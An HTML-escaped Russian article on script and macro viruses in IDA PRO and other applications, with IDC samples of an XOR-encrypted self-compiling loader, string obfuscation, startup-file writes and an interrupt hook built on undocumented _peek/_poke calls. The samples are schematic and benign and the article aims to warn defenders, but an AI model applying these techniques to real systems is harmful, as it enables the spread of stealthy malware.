						&lt;p&gt;Любопытно, что вирусы для Quake и Unreal не детектируются абсолютно ничем. Ни AVP, ни&lt;br /&gt;DrWeb о них ничего не знают. Впрочем, это простительно для разработчиков. Сегодня&lt;br /&gt;практически каждый уважающий себя программный пакет поддерживает скриты или&lt;br /&gt;макрокоманды. Даже при желании уследить за всеми происходящими событиями невозможно.&lt;br /&gt;Совсем недавно, буквально в июле этого года появились первые вирусы и троянские&lt;br /&gt;дополнения к профессиональному дизассемблеру IDA PRO. В этом не было бы ничего&lt;br /&gt;удивительного, если бы средства языка обеспечивали бы поиск файлов для возможного&lt;br /&gt;инфицирования. Таковых функций IDA PRO не поддерживала, а значит, и существование&lt;br /&gt;вирусов (в традиционном понимании этого слова) было в ней невозможным.&lt;/p&gt;
						&lt;p&gt;Поэтому заявления, что оные все же обнаружены, встретили большой скепсис среди&lt;br /&gt;разработчиков антивирусного программного обеспечения. На сегодняшний день эти вирусы&lt;br /&gt;не детектируются ничем. Между тем, большинство пиратских копий заражено и любители&lt;br /&gt;нелицензионного программного обеспечения подвергают себя опасности. На самом деле все&lt;br /&gt;вирусы подобного типа очень легко обнаруживаются простым визуальным просмотром&lt;br /&gt;скрипта. Достаточно дать себе немного труда проанализировать алгоритм работы&lt;br /&gt;последнего, ну и конечно, иметь представление на что обращать внимание в первую&lt;br /&gt;очередь.&lt;/p&gt;
						&lt;p&gt;Прежде всего все вирусы подобного типа можно разделить на две большие категории.&lt;br /&gt;Первые манипулируют только документами приложения и остаются исключительно в рамках&lt;br /&gt;виртуальной машины интерпретатора скрипта. Вторя же категория может выполнять команды&lt;br /&gt;процессора и операционной системы, а значит, не только инфицировать или уничтожать&lt;br /&gt;исполняемые файлы, но даже &amp;quot;покрошить&amp;quot; Ваш жесткий диск!&lt;/p&gt;
						&lt;p&gt;Последние опаснее, а, значит, интереснее. Вот с их рассмотрения мы и начнем. Самый&lt;br /&gt;простой способ вырваться из застенок виртуальной машины это воспользоваться файловым&lt;br /&gt;вводом \ выводом. Допустим, можно записать любую пришедшую нам на ум команду MS-DOS в&lt;br /&gt;файл C:\Windows\winstart.bat (ну или autoexec.bat) будучи уверенным, что рано или&lt;br /&gt;поздно он будет исполнен.&lt;/p&gt;
						&lt;p&gt;На языке IDA-Си это может выглядеть так.&lt;/p&gt;
						&lt;p&gt;auto a;&lt;br /&gt;a=fopen(&amp;quot;C:\\WINDOWS\\winstart.bat&amp;quot;,&amp;quot;wb&amp;quot;);&lt;br /&gt;writestr(a,&amp;quot;@ECHO Hello, Hard Disk \n&amp;quot;);&lt;br /&gt;fclose(a);&lt;/p&gt;
						&lt;p&gt;подобные файловые операции поддерживают большинство языков. Обычно, впрочем, они не&lt;br /&gt;используются программистами, поэтому их наличие в скрипте - повод для тщательного&lt;br /&gt;изучения его алгоритма (благо большинство скриптов передаются в исходных текстах)&lt;/p&gt;
						&lt;p&gt;Впрочем, некоторые интерпретаторы лишены из соображений политики безопасности&lt;br /&gt;низкоуровневых операций с файлами. Но это разве преграда? Создаем документ с искомой&lt;br /&gt;строкой и выполняем команду &amp;quot;сохранить как_&amp;quot; Поскольку все приложения позволяют&lt;br /&gt;задавать расширения сохраняемых документов по желанию пользователя (или скрипта) то&lt;br /&gt;такая схема оказывается очень живучей.&lt;/p&gt;
						&lt;p&gt;Вслед за этими появились вирусы, которые использовали низкоуровневые файловые операции&lt;br /&gt;для модификации исполняемых файлов. Действительно, что стоит загрузить жертву в&lt;br /&gt;память, инфицировать любым возможным алгоритмом и записать вновь на диск?&lt;/p&gt;
						&lt;p&gt;Таким образом вирус вырвется за пределы виртуальной машины и начтет гулять по диску.&lt;br /&gt;Конечно, это окажется нежизнеспособно на Windows NT, при условии правильного подхода к&lt;br /&gt;разграничению доступа к ресурсам, но для многих пользователей станет неожиданным&lt;br /&gt;сюрпризом, ведь большинство из них полагает, что макро-вирусы существуют только в&lt;br /&gt;Ворде и диск отформатировать вряд ли смогут. А отсюда и беспечность.&lt;/p&gt;
						&lt;p&gt;Беспечность необъяснимая и неоправданная. Ведь большинство интерпретаторов&lt;br /&gt;поддерживают команду &amp;quot;Exec&amp;quot; для запуска внешних приложений из скрипта. Злоумышленники&lt;br /&gt;могут вызвать &#039;format.com&#039; поэтому не помешает его запрятать подальше или даже вообще&lt;br /&gt;исключить с дисков всех пользователей, через чьи руки проходят сомнительные скрипты и&lt;br /&gt;документы.&lt;/p&gt;
						&lt;p&gt;Необходимо отметить, что реализация exec часто сводится к вызову win32 API функции&lt;br /&gt;CreateProcess, другими словами расширение файла не играет никакой роли. MyDocument.doc&lt;br /&gt;вполне может быть запущен, не смотря на &amp;quot;неисполняемое&amp;quot; расширение. Следовательно,&lt;br /&gt;вирус может создавать внешне легальный файл документа, чем и маскировать свое&lt;br /&gt;присутствие.&lt;/p&gt;
						&lt;p&gt;Впрочем, все эти &amp;quot;махинации&amp;quot; могут быть обнаружены простым сканированием скрипта на&lt;br /&gt;предмет ключевых слов &amp;quot;exec, fopen&amp;quot; и других. Поэтому следующим этапом эволюции было&lt;br /&gt;создание шифируюшихся вирусов. На первый взгляд это нереально. Как может&lt;br /&gt;расшифровываться интерпретируемый скрипт если он совершенно не имеет представления о&lt;br /&gt;физической памяти, в которую он загружен.&lt;/p&gt;
						&lt;p&gt;Действительно, это так. Поэтому в первые представители этого класса всего лишь&lt;br /&gt;шифровали свои данные, текстовые строки с именами файлов-жертв. Впрочем, расшифровки&lt;br /&gt;сразу бросались в глаза при анализе или даже простом просмотре текстов скриптов. Что&lt;br /&gt;бы это скрыть стали генерировать текстовые строки на основе запутанных функций.&lt;br /&gt;Внимания к себе они не привлекали и рассчитывали на то, что мало кто будет прибегать к&lt;br /&gt;тщательному анализу всего файла.&lt;/p&gt;
						&lt;p&gt;auto a,b,c,d;&lt;br /&gt;a=&amp;quot;ida.&amp;quot;;&lt;br /&gt;b=0xCA;&lt;br /&gt;c=b/2;&lt;br /&gt;b=b&amp;gt;&amp;gt;1;&lt;br /&gt;d=b + (b&amp;gt;&amp;gt;5) | (1&amp;lt;&amp;lt;4);&lt;br /&gt;a=a+c+d+b;&lt;br /&gt;Message(&amp;quot;%s \n&amp;quot;,a);&lt;/p&gt;
						&lt;p&gt;В приведенном примере результат всех этих математических вычислений наперед далеко не&lt;br /&gt;очевиден и не может быть спрогнозирован никаким эвристическим анализатором. Разве&lt;br /&gt;только, что разработчики отважатся реализовать полный эмулятор интерпретируемого&lt;br /&gt;языка. Но пока такая задача не представляется реальной, ввиду множества существующих и&lt;br /&gt;ни с чем ни совместимых скрипт-языков.&lt;/p&gt;
						&lt;p&gt;Однако, ключевые команды типа &amp;quot;exec&amp;quot; оставались в открытом виде и обнаруживались&lt;br /&gt;тривиальным сканированием файла. Поэтому вирусописатели предприняли попытку скрыть их&lt;br /&gt;от посторонних глаз. IDA PRO, как и большинство других интерпретаторов имела&lt;br /&gt;возможность загрузки скриптов с диска. Это дало возможность создать временный файл, в&lt;br /&gt;который записать расшифрованное тело вируса, и затем передать ему управление.&lt;/p&gt;
						&lt;p&gt;Что бы Вы думали делает приведенная ниже программа?&lt;/p&gt;
						&lt;p&gt;static main()&lt;br /&gt;{&lt;br /&gt;auto a,b,temp,s0;&lt;br /&gt;b=0;&lt;br /&gt;s0=&amp;quot;0x040x030x160x030x1E0x140x570x1A0x160x1E0x19&lt;br /&gt;0x5F0x5E0x570x0C0x3A0x120x040x040x160x100x12&lt;br /&gt;0x5F0x550x3F0x120x1B0x1B0x180x5B0x570x3e0x33&lt;br /&gt;0x360x560x570x2B0x190x550x5E0x4C0x0A0x7A0x7D 0x00\n&amp;quot;;&lt;br /&gt;a=fopen(&amp;quot;temp.idc&amp;quot;,&amp;quot;wb&amp;quot;);&lt;br /&gt;while(1)&lt;br /&gt;{&lt;br /&gt;temp=substr(s0,b,b+4);&lt;br /&gt;b=b+4;&lt;br /&gt;temp=xtol(temp);&lt;br /&gt;if (temp==0) break;&lt;br /&gt;temp=temp ^ 0x77;&lt;br /&gt;fputc(temp,a);&lt;br /&gt;}&lt;br /&gt;fclose(b);&lt;br /&gt;Compile(&amp;quot;temp.idc&amp;quot;);&lt;br /&gt;}&lt;/p&gt;
						&lt;p&gt;Да, действительно, она иллюстрирует классический пример шифрованных вирусов. Для&lt;br /&gt;упрощения данный пример использует &amp;quot;вирусоопасный&amp;quot; вызов &amp;quot;fopen&amp;quot;, но нетрудно оформить&lt;br /&gt;его как сохранение документа или генерацию отчета.&lt;/p&gt;
						&lt;p&gt;Вызов &amp;quot;Compile&amp;quot; к сожалению не может считаться характерным для вирусов, поскольку он&lt;br /&gt;очень часто употребляется мирными программами для подзагрузки своих модулей. Ведь&lt;br /&gt;редко кто пишет сколь ни будь серьезные скрипты в одном файле. Поэтому в целом такие&lt;br /&gt;вирусы выглядят на внешний вид безвинно.&lt;/p&gt;
						&lt;p&gt;Сейчас в Сети много таких дополнений к IDA, даже появились классические &amp;quot;Универсальный&lt;br /&gt;Кракер&amp;quot; и &amp;quot;Кракер Интернета PRO&amp;quot;. Впрочем, последний это все же действительно&lt;br /&gt;предоставляет бесплатный доступ в Интернет, а не форматирует жесткий диск. Он&lt;br /&gt;дозванивается до провайдера по указанному номеру, активно мигая лампочками модема,&lt;br /&gt;после чего сообщает, что якобы утащен зашифрованный файл паролей и в подтверждение&lt;br /&gt;этого выплевывает нечитабельный текст на экран. Далее сообщается, что расшифровать это&lt;br /&gt;может автор скрипта, всего за 1$, а до 1 сентября в рамках рекламной компании и вовсе&lt;br /&gt;бесплатно - достаточно только отослать ему это по следующему адресу. И пользователь&lt;br /&gt;сам того не подозревая, отправляет не зашифрованный файл паролей провайдера, а свой&lt;br /&gt;логин и пароль, &amp;quot;поксоренный&amp;quot; и дополненный мусором, что бы не бросаться в глаза.&lt;/p&gt;
						&lt;p&gt;Попадаются даже творения выполненные по &amp;quot;стелс&amp;quot; технологии. Вирус перехватывает&lt;br /&gt;событие &amp;quot;OnOpen&amp;quot; и &amp;quot;OnLoad&amp;quot; и вручную загружает файл таким образом, что бы он выглядел&lt;br /&gt;в незараженном виде. Поэтому просматривать скрпты на предмет поиска вирусов можно&lt;br /&gt;только средствами, гарантирующими достоверность отображения и невозможность внедрения&lt;br /&gt;постороннего кода.&lt;/p&gt;
						&lt;p&gt;Обычно это &amp;quot;блокнот&amp;quot; или другой простейший редактор. Это справедливо для IDA PRO, но&lt;br /&gt;часто оказывается невозможным для тех приложений, которые скрипты хранят в собственном&lt;br /&gt;формате вместе с документом. В таком случае просмотр внешними средствами оказывается&lt;br /&gt;невозможным.&lt;/p&gt;
						&lt;p&gt;Вслед за &amp;quot;стелс&amp;quot; были написаны и полиморфные вирусы. Для IDA PRO на сегодняшний момент&lt;br /&gt;известно два из них и оба функционируют по одному и тому же принципу. Это обычный&lt;br /&gt;шифрованный вирус с множеством расшифровщиков. Причем сам алгоритм генерируется&lt;br /&gt;&amp;quot;налету&amp;quot;. Они в настоящий момент не определяются ни одним антивирусом. Впрочем, к&lt;br /&gt;чести их авторов к скриптам приложен подробный файл описания, что эта программа делает&lt;br /&gt;и перед каждым заражением запрашивается подтверждение пользователя. Но что стоит,&lt;br /&gt;удалив всего одну строку, получить &amp;quot;полноценный&amp;quot; современный вирус, которым потом&lt;br /&gt;можно заразить множество ничего не подозревающих пользователей, недоумевающих почему&lt;br /&gt;разработчики антивирусного обеспечения будучи информированными об этой проблеме&lt;br /&gt;продолжают ее спокойно игнорировать, вероятно, полагая, что IDA PRO не настолько&lt;br /&gt;распространенный продукт, что бы тратить человеко-часы на анализ и включение в базу&lt;br /&gt;этих &amp;quot;насекомых&amp;quot;?&lt;/p&gt;
						&lt;p&gt;Между тем 8 из 10 известных мне источников IDA PRO заражены теми или иными вирусами.&lt;br /&gt;Кстати, никак не проявляющими себя, но написанными достаточно некорректно, что бы&lt;br /&gt;приводить к нестабильной работе, сбоям и зависаниям дизассемблера. Не так редки вирусы&lt;br /&gt;и под &amp;quot;Visual Studio&amp;quot;, попадающие на компакт-диски, но это уже другая история.&lt;/p&gt;
						&lt;p&gt;Их проявления и возможности ничем не ограничены, ведь как было показано выше,&lt;br /&gt;практически из любой виртуальной машины можно вырваться и передать управление&lt;br /&gt;процессора на свой код.&lt;/p&gt;
						&lt;p&gt;Однако, прием создать файл, а затем его запустить все же несерьезен и на системах с&lt;br /&gt;правильно организованной системой разграничения доступа просто не работоспособен.&lt;br /&gt;Существуют ли другие пути? Да, существуют. Многие интерпретаторы имеют &amp;quot;лазейки&amp;quot; -&lt;br /&gt;недокументированные функции, позволяющие делать то, что мягко выражаясь ни в коем&lt;br /&gt;случае не положено.&lt;/p&gt;
						&lt;p&gt;Например, IDA PRO имеет функции _peek и _poke, читающие и записывающие физическую&lt;br /&gt;память компьютера. Следовательно, можно передать управление на свой код! Однако, для&lt;br /&gt;этого его сперва нужно скопировать в память, и не на первое попавшиеся место, а&lt;br /&gt;обязательно в свободный регион, иначе система рискует повиснуть вместе с вирусом, что&lt;br /&gt;будет сигнализировать о ненормальности ситуации (стоит ли говорить, что большинство&lt;br /&gt;опытных пользователей присутствие вирусов на своем компьютере замечает именно по&lt;br /&gt;конфликтам).&lt;/p&gt;
						&lt;p&gt;В MS-DOS свободному региону соответствует нулевое значение хозяина блока в заголовке&lt;br /&gt;MCB. Но что бы проскандировать всю цепочку необходимо узнать адрес первого блока. Но&lt;br /&gt;кто его скажет вирусу? Однако, существуют способы узнать это самостоятельно и ниже&lt;br /&gt;будет показан один из них.&lt;/p&gt;
						&lt;p&gt;Но как теперь передать управление процессору на наш код? Это головоломная на первый&lt;br /&gt;взгляд задача имеет множество решений и одно из них заключается в модификации&lt;br /&gt;обработчика клавиатурного прерывания (мы ведь можем писать в память!) таким образом,&lt;br /&gt;что бы он указывал на наш код. Рано или поздно пользователь нажмет на клавишу и вирус&lt;br /&gt;получит управление.&lt;/p&gt;
						&lt;p&gt;static MyGetByte(a)&lt;br /&gt;{&lt;br /&gt;return (_peek(a) &amp;amp; 0xFF);&lt;br /&gt;}&lt;br /&gt;static MyGetWord(a)&lt;br /&gt;{&lt;br /&gt;return MyGetByte(a)+(MyGetByte(a+1)*0x100);&lt;br /&gt;}&lt;br /&gt;static GetNextMCB(a)&lt;br /&gt;{&lt;br /&gt;a=a+ (MyGetWord(a+3) &amp;lt;&amp;lt;4) +0x10;&lt;br /&gt;return a;&lt;br /&gt;}&lt;br /&gt;static GoToMCB(a)&lt;br /&gt;{&lt;br /&gt;if (_peek(a)!=&#039;M&#039;) return 0;&lt;br /&gt;while(1)&lt;br /&gt;{&lt;br /&gt;a=GetNextMCB(a);&lt;br /&gt;if (_peek(a)==&#039;Z&#039;) return 1;&lt;br /&gt;if (_peek(a)!=&#039;M&#039;) return 0;&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;static FindFirstMCB()&lt;br /&gt;{&lt;br /&gt;auto a;&lt;br /&gt;a=0x0;&lt;br /&gt;while(1)&lt;br /&gt;if (GoToMCB(++a)) break;&lt;br /&gt;return a;&lt;br /&gt;}&lt;br /&gt;static FindFreeMCB()&lt;br /&gt;{&lt;br /&gt;auto a;&lt;br /&gt;a=FindFirstMCB();&lt;br /&gt;while(MyGetWord(a+1))&lt;br /&gt;{&lt;br /&gt;a=GetNextMCB(a);&lt;br /&gt;if (MyGetByte(a)==&#039;Z&#039;) return 0;&lt;br /&gt;}&lt;br /&gt;return a;&lt;br /&gt;}&lt;br /&gt;static SaveInt0x16(a)&lt;br /&gt;{&lt;br /&gt;auto temp;&lt;br /&gt;for (temp=0;temp&amp;lt;4;temp++)&lt;br /&gt;_poke(a+temp,MyGetByte(0x16*4+temp));&lt;br /&gt;}&lt;br /&gt;static SetNewInt0x16(a)&lt;br /&gt;{&lt;br /&gt;_poke(0x16*4,a);&lt;br /&gt;a=a&amp;gt;&amp;gt;4;&lt;br /&gt;a=a &amp;amp; 0xFFF0;&lt;br /&gt;_poke(0x16*4+1,0);&lt;br /&gt;_poke(0x16*4+2,a);&lt;br /&gt;a=a&amp;gt;&amp;gt;8;&lt;br /&gt;_poke(0x16*4+3,a);&lt;br /&gt;}&lt;br /&gt;static CopyEject(a)&lt;br /&gt;{&lt;br /&gt;_poke(a,0xCF);&lt;br /&gt;}&lt;br /&gt;static SetOldInt0x16(a)&lt;br /&gt;{&lt;br /&gt;auto temp;&lt;br /&gt;for (temp=0;temp&amp;lt;4;temp++)&lt;br /&gt;_poke(0x16*4+temp,MyGetByte(a+temp));&lt;br /&gt;}&lt;br /&gt;static main()&lt;br /&gt;{&lt;br /&gt;auto a;&lt;br /&gt;a=FindFreeMCB();&lt;br /&gt;if (!a) return;&lt;br /&gt;Message(&amp;quot;Найден свободный блок по адресу %x \n&amp;quot;,a);&lt;br /&gt;if (!AskYN(&amp;quot;NO&amp;quot;,&amp;quot;Сейчас будет инфицирован Ваш компутер \n Вы в самом деле хотите&lt;br /&gt;это сделать? Подтвердите!&amp;quot;))return;&lt;br /&gt;if (!AskYN(&amp;quot;NO&amp;quot;,&amp;quot;Подтвердите необходимость инфицирования еще раз!&amp;quot;)) return;&lt;br /&gt;SaveInt0x16(a);&lt;br /&gt;CopyEject(a+4);&lt;br /&gt;SetNewInt0x16(a+4);&lt;br /&gt;AskYN(&amp;quot;X&amp;quot;,&amp;quot;Поздравляем Вас с успешной активацией вируса!&amp;quot;);&lt;br /&gt;SetOldInt0x16(a);&lt;br /&gt;}&lt;/p&gt;
						&lt;p&gt;Схематичный пример показан выше. Тело вируса в нем отсутствует, и весь смысл сводится&lt;br /&gt;лишь к тому, что бы передать управление процессора на команду возврата из программы&lt;br /&gt;&#039;ret&#039;. Работать это будет исключительно в среде чистой MS-DOS (консольный режим win32&lt;br /&gt;за таковой не считается) и поэтому представляет не более чем познавательный интерес.&lt;/p&gt;
						&lt;p&gt;Но существуют экземпляры, которые функционируют и в казалось бы защищенной Windows NT.&lt;br /&gt;Да, выйти за пределы третьего кольца защиты там невозможно (ну будем считать, что&lt;br /&gt;невозможно) ввиду архитектуры самой системы, но вирусу для многих действий и третьего&lt;br /&gt;кольца хватит с лихвой.&lt;/p&gt;
						&lt;p&gt;В IDA функции _peek и _poke недокументированны, но тем не менее присутствуют и&lt;br /&gt;являются ключевой частью ядра для собственных нужд дизассемблера. Можно ли&lt;br /&gt;гарантировать, что подобных &amp;quot;лазеек&amp;quot; нет в других пакетах?&lt;/p&gt;
						&lt;p&gt;Разумеется нет! История не однократно убеждала в том, что незакрытые люки и отладочные&lt;br /&gt;функции явление привычное. К тому же большинство из них обнаруживаются элементарным&lt;br /&gt;образом. Например, если посмотреть какие функции экспортирует IDA.WLL, то среди них&lt;br /&gt;обнаружится не только _peek и _poke, но и даже _call! Таким образом обеспечивая всю&lt;br /&gt;необходимую злоумышленнику низкоуровневую работу.&lt;/p&gt;
						&lt;p&gt;Перейдем теперь ко второй группе - существующей только в рамках одного приложения. За&lt;br /&gt;кажущейся внешней безопасностью такие вирусы могут нанести даже более существенный&lt;br /&gt;урон, ибо порча исполняемых файлов всегда может быть ликвидирована переустановкой&lt;br /&gt;программного обеспечения с дистрибьютивных дисков, то искажение документов&lt;br /&gt;пользователя часто оказывается необратимым.&lt;/p&gt;
						&lt;p&gt;Рассмотрим типичную ситуацию - пишет человек книгу, которую периодически резервирует&lt;br /&gt;на внешний носитель (дискету, скажем). При этом, разумеется, новая копия затирает&lt;br /&gt;предыдущую. Если в этот момент целостность сохраняемого документа была нарушена то&lt;br /&gt;восстановление окажется невозможным (ведь оригинал затерт). Что стоит вирусу в&lt;br /&gt;огромном документе стереть несколько фрагментов или исказить их? Маловероятно, что&lt;br /&gt;пользователь на это сразу обратит внимание. А когда обратит, то скорее всего будет уже&lt;br /&gt;поздно и потребуется тщательно перечитать весь текст, проводя утомительную работу по&lt;br /&gt;его восстановлению. То же можно отнести и к электронным таблицам, например. Или&lt;br /&gt;текстам программ (на платформах Visual Studio, IDA и т.д.)&lt;/p&gt;
						&lt;p&gt;Проблема в невозможности отличить действия пользователя от действий вируса. Макрос&lt;br /&gt;оболочки FAR, удаляющий все файлы без подтверждения будет работать и защищенных&lt;br /&gt;операционных системах, наследуя права пользователя, и в отличие от &amp;quot;обычных&amp;quot; вирусов&lt;br /&gt;он не вызовет подозрений при установке. Да и антивирусы его не заметят. Ну никто не&lt;br /&gt;собирается поддерживать все программные пакеты, включая такие незначительные как FAR.&lt;/p&gt;
						&lt;p&gt;Итак, макрокоманды. Записанные последовательности нажатий или сочетаний клавиш,&lt;br /&gt;которые могут впоследствии выполняться автоматически. Это настолько удобно, что&lt;br /&gt;сегодня поддерживается практически всеми пакетами. Отказываться от этой возможности&lt;br /&gt;бессмысленно, но необходимо по крайней мере обеспечить такой уровень безопасности, что&lt;br /&gt;бы вирус не мог создавать и назначать горячие клавиши макросам самостоятельно.&lt;/p&gt;
						&lt;p&gt;К сожалению в жизни макросы настолько тесно связаны с интегрируемым языком, что&lt;br /&gt;последний называют макроязыком, чаще чем скриптами. Вирусу ничего не стоит, скажем, на&lt;br /&gt;клавишу Insert &amp;quot;подцепить&amp;quot; последовательность в стиле &amp;quot;Выделить все&amp;quot;, &amp;quot;удалить&amp;quot;,&lt;br /&gt;&amp;quot;записать&amp;quot;. После чего пользователю остается только рвать на себе волосы.&lt;/p&gt;
						&lt;p&gt;В IDA нет подобных функций и никакого программного управления макросами там нет. Все&lt;br /&gt;они должны быть непосредственно заданы в файле idatui.cfg или введены с клавиатуры.&lt;br /&gt;Однако, это ограничение для вирусов &amp;quot;прозрачно&amp;quot;. Они открывают нужный файл, записывают&lt;br /&gt;в него вредоносный макрос и_&lt;/p&gt;
						&lt;p&gt;Другие пакеты имеют схожие проблемы с безопасностью. Некоторые из них, как например&lt;br /&gt;FAR, хранят макросы в реестре. Вирус может либо импортировать новую запись в реестр,&lt;br /&gt;либо воспользоваться функциями API для его модификации. И то и то современные&lt;br /&gt;приложения обычно предоставляют скриптам в свое распоряжение.&lt;/p&gt;
						&lt;p&gt;Кроме того, существует такое понятие, как эмуляция ввода. Для этого достаточно послать&lt;br /&gt;окну соответствующую серию сообщений. Причем никто не запрещает выходить за пределы&lt;br /&gt;родительского окна и посылать сообщения любому на свой выбор. Для этого достаточно&lt;br /&gt;воспользоваться функцией Win32 API FindWindow.&lt;/p&gt;
						&lt;p&gt;Чаще всего предметом атак становиться эксплодер или проводник Windows. Вирус может&lt;br /&gt;использовать его для размножения и внедрения в другие объекты, а так же для&lt;br /&gt;всевозможных &amp;quot;шуток&amp;quot; типа трясущихся или &amp;quot;убегающих от курсора&amp;quot; окон.&lt;/p&gt;
						&lt;p&gt;Заявление, что такое возможно из языка IDA вызвало большой скепсис среди разработчиков&lt;br /&gt;антивирусов. Действительно, ее язык не поддерживает функции win32 API и никак не&lt;br /&gt;представляет такой возможности. На само же деле это возможно. Возможно благодаря&lt;br /&gt;функции _CALL, которая передает управление по указанному физическому адресу. Впрочем,&lt;br /&gt;задача вычисления адресов требуемых функций, и передача параметров (call никаких&lt;br /&gt;параметров не принимает и не возвращает) достаточно нетривиальна и интересна сама по&lt;br /&gt;себе. Не вникая в подробности технической реализации, оптимальное решение заключается&lt;br /&gt;в поиске свободного фрагмента памяти (а под win32 это уже весьма нетривиальная задача&lt;br /&gt;и для ее решения необходимо быть осведомленным во многих тонкостях организации памяти)&lt;br /&gt;и копировании в него простейшего менеджера, обеспечивающего обмен параметрами и&lt;br /&gt;вычисления необходимого адреса процедуры. Разумеется, что ничего не остается, кроме&lt;br /&gt;как воспользоваться GetProcAddress. Весь фокус в том &amp;quot;волшебном&amp;quot; способе получения&lt;br /&gt;адреса этой функции. Зная его ничего не стоит вызывать из IDA все богатство функций&lt;br /&gt;win32 API. В этом случае возможности вируса будут ограничиваться лишь злобностью или&lt;br /&gt;фантазией злоумышленника.&lt;/p&gt;
						&lt;p&gt;Все описанные выше вирусы можно назвать неризедентыми, поскольку они активны только в&lt;br /&gt;момент запуска макроса или скрипта. Однако, существуют и такие, что остаются в течении&lt;br /&gt;всего сеанса работы.&lt;/p&gt;
						&lt;p&gt;Что бы получать управление вирусу приходится перехватывать одно из многочисленных&lt;br /&gt;событий, таких, например, открытие файла или документа, начало и завершения сеанса&lt;br /&gt;работы. По аналогии с древними &amp;quot;досовскими&amp;quot; вирусами это можно назвать перехватом&lt;br /&gt;прерываний. Хотя в данном случае рассматриваются уже не прерывания, но с точки зрения&lt;br /&gt;вируса нет существенной разницы, да и обработка их осуществляется аналогично.&lt;/p&gt;
						&lt;p&gt;Отметим, что только резидентные вирусы способны стелсироваться. Для этого они должны&lt;br /&gt;грузиться по возможности раньше остальных программ. В IDA файл IDA.IDC автоматически&lt;br /&gt;выполняется каждый раз при запуске. Очень часто он становиться объектом атаки вирусов.&lt;br /&gt;К счастью он состоит не многим более десятка строк и любые посторонние включения&lt;br /&gt;нетрудно заметить. Впрочем, это не характерно для других приложений. Часто число строк&lt;br /&gt;в стартовых файлах (то есть файлах инициализации) очень велико и их нельзя отключить&lt;br /&gt;без ущерба для работы системы. Чем больше файл, тем легче затеряться в нем вирусу.&lt;br /&gt;Особенно, если приложение не озабоченно проверкой целостности своего хозяйства.&lt;/p&gt;
						&lt;p&gt;Стоить отдать должное тем разработчикам, которые из соображений политики безопасности&lt;br /&gt;хотя бы предоставляют возможность отключения обработки макросов, скриптов и событий.&lt;br /&gt;Word на самом деле не относиться к их числу. Генерация событий не отключается.&lt;br /&gt;Блокируется лишь выполнение макросов. При этом существует достаточно много способов&lt;br /&gt;перехватить управление на себя (ведь события все продолжают генерироваться и&lt;br /&gt;обрабатываться!) То что пока нет известных вирусов, реализующих такие идеи, еще не&lt;br /&gt;повод беспечно считать, что их не будет в и дальнейшем.&lt;/p&gt;
						&lt;p&gt;Впрочем, разработчикам антивирусов вероятно это известно, более того даже имеют&lt;br /&gt;готовые модули для интеграции в свой продукт, но не делают этого. Почему? Не хотят&lt;br /&gt;вирусописателям дарить лишние идеи. Ждут пока те до этого додумаются сами. Это по&lt;br /&gt;официальным данным.&lt;/p&gt;
						&lt;p&gt;А по неофициальным - просто дают понять значимость новых версий и необходимость&lt;br /&gt;технической поддержки. Какая разница догадаются вирусописатели до новой идеи сегодня&lt;br /&gt;или через день. А вот пользователь страдает. Его любимый антивирус не защищает от&lt;br /&gt;новых насекомых, а ведь мог бы_.&lt;/p&gt;
						&lt;p&gt;В этот отношении IDA аналогична. Файл &#039;OnLoad.idc&#039; выполняется при любой загрузке&lt;br /&gt;анализируемых файлов в дизассемблер. Следовательно, вирус может это перехватить и&lt;br /&gt;представить файл как незараженный.&lt;/p&gt;
						&lt;p&gt;Такие вирусы действительно существуют. Они поражают PE файлы windows и отличаются от&lt;br /&gt;&amp;quot;обычных&amp;quot; только тем, что так модифицируют &#039;OnLoad.idc&#039;, что с IDA неправильно&lt;br /&gt;дизассемблирует зараженные файлы, следовательно и результаты анализа окажутся неверны.&lt;br /&gt;Конечно, трудно поверить, что разработчики и исследователи вирусов могу допустить&lt;br /&gt;такое на своем компьютере. Но где гарантия что беспечность не сыграет своей злой роли,&lt;br /&gt;так что на это просто не обратят внимание? Тем более, что IDA широко используется для&lt;br /&gt;анализа вирусов и противодействие ей это достаточно эффективный способ затруднить&lt;br /&gt;анализ.&lt;/p&gt;
						&lt;p&gt;Отсюда же возможно внедрение вируса во все дизассемблируемые файлы. Дело в том, что&lt;br /&gt;IDA лишь однократно загружает файл в свою базу, а потом к нему уже никогда не&lt;br /&gt;обращается. Неплохая мысль после окончания загрузки его инфицировать. Если до этого&lt;br /&gt;момента файл был здоров, что и подтвердит дизассемблирование, то никто не&lt;br /&gt;поинтересуется дальнейшей судьбой этого файла.&lt;/p&gt;
						&lt;p&gt;Такое случилось в одной организации, когда уважаемая фирма подрядилось провести в оной&lt;br /&gt;тщательный поиск вирусов и закладок. Юный хакер в это время сумел добраться по&lt;br /&gt;локальной сети организации и модифицировать файл &#039;OnLoad.idc&#039; (а поиск &amp;quot;насекомых&amp;quot;&lt;br /&gt;проводился, разумеется, с помощью IDA). В результате ни одна закладка обнаружена не&lt;br /&gt;была, да еще и оказались добавлены новые. Нельзя назвать мастером того, кто&lt;br /&gt;досконально не знает своего инструмента. Его сильных и слабых сторон. К сожалению,&lt;br /&gt;сегодня программные пакеты настолько сложны и велики, что просто не реально полностью&lt;br /&gt;изучить их до появления новой кардинально переработанной версии.&lt;/p&gt;
						&lt;p&gt;Следовательно, даже специалисты не застрахованы от атак злоумышленников. И это&lt;br /&gt;случается на порядок чаще, чем того можно было предполагать. Ведь не все &amp;quot;специалисты&amp;quot;&lt;br /&gt;профессионалы. Это такие же люди с присущими им слабостями и беспечностью.&lt;/p&gt;
						&lt;p&gt;Только беспечностью объясняться вера в непогрешимость IDA. На самом же деле она, как и&lt;br /&gt;любой другой программный пакет может быть заражена вирусами без ведома пользователя. И&lt;br /&gt;если разработчики антивирусного обеспечения не изменят своего отношения к ситуации в&lt;br /&gt;ближайшем времени, то вирусописатели могут склониться в сторону вирусов-скриптов для&lt;br /&gt;узкоспециализированных продуктов.&lt;/p&gt;
						&lt;p&gt;В этом случае нарушиться оперативность пополнения антивирусных баз и эпидемия рискует&lt;br /&gt;охватить большое число пользователей и принести огромный убыток множеству фирм. Ведь&lt;br /&gt;наработки профессионала стоят значительно дороже, чем множество игрушек на компьютере&lt;br /&gt;&amp;quot;общего назначения&amp;quot;.&lt;/p&gt;
						&lt;p&gt;К тому же если программы сегодня практически уже не копируют друг у друга, а&lt;br /&gt;приобретают лицензионный диск (без шуток - мы говорим о высокооплачиваемых&lt;br /&gt;профессионалах!) или идут непосредственно на сайт разработчика, то документы все&lt;br /&gt;интенсивно копируют друг и друга!&lt;/p&gt;
